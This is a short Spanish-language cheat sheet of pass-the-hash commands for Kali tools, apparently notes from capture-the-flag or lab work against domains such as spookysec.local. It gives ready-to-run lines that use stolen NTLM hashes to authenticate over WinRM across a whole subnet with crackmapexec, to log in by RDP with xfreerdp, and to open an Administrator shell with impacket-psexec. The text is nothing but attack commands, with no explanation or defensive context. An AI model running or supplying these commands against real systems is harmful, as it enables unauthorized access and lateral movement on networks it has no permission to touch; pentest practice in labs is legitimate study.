Estas tools vienen instaladas en Kali.

con hashes:
crackmapexec winrm 10.10.11.0/24 -u 'Pepe' -H '3bc512358ca54e8c64cfd5dfce5a42ae' -d internet.pepino
RDP login:
xfreerdp /u:svc-admin /d:spookysec /pth:fc0f1e5359e372aa1f69147375ba6809 /v:10.10.216.111
Powershell console:
impacket-psexec Administrator:@spookysec.local -hashes aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc -target-ip 10.10.106.249